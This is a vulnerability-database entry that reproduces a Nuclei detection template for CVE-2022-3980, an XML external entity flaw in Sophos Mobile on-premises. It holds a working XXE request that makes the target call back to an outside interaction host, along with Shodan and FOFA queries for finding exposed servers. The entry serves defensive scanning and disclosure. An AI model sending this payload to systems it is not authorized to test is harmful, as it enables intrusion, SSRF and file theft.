Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2022-3980
HistoryMay 09, 2023 - 4:15 p.m.

Sophos Mobile managed on-premises - XML External Entity Injection

2023-05-0916:15:10
ProjectDiscovery
github.com
5
sophos
mobile
xxm
ssrf
cve2022

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.389

Percentile

97.3%

JSON
An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.

id: CVE-2022-3980

info:
  name: Sophos Mobile managed on-premises - XML External Entity Injection
  author: dabla
  severity: critical
  description: |
    An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
  remediation: |
    Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability.
  reference:
    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3980
    - https://github.com/bigblackhat/oFx
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-3980
    cwe-id: CWE-611
    epss-score: 0.35251
    epss-percentile: 0.97125
    cpe: cpe:2.3:a:sophos:mobile:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sophos
    product: mobile
    shodan-query:
      - http.favicon.hash:-1274798165
      - http.title:"sophos mobile"
    fofa-query:
      - title="Sophos Mobile"
      - icon_hash=-1274798165
      - title="sophos mobile"
    google-query: intitle:"sophos mobile"
  tags: cve,cve2022,xxe,ssrf,sophos

http:
  - raw:
      - |
        @timeout: 50s
        POST /servlets/OmaDsServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: "application/xml"

        <?xml version="1.0"?>
        <!DOCTYPE cdl [<!ENTITY % test SYSTEM "http://{{interactsh-url}}">%test;]>
        <cdl>test</cdl>

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'http') || contains(interactsh_protocol, 'dns')"
          - "status_code == 400"
          - "len(body) == 0"
        condition: and
# digest: 4a0a00473045022100e2c1e122f1c0b31a4d9b7a1d627c23c6927ab04afc2c22896f566b22099045d20220723074a6d2578d3242ff20877ef7d2c6c783861ba9027f0fe538fa47f15a41d9:922c64590222798bb761d5b6d8e72950

Related

cvelist 1
prion 1
nvd 1
cve 1
cvelist
cvelist
CVE-2022-3980
2022-11-16 00:00:00
prion
prion
Server side request forgery (ssrf)
2022-11-16 13:15:00
nvd
nvd
CVE-2022-3980
2022-11-16 13:15:10
cve
cve
CVE-2022-3980
2022-11-16 13:15:10

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.389

Percentile

97.3%

JSON
Related for NUCLEI:CVE-2022-3980
cvelist1prion1nvd1cve1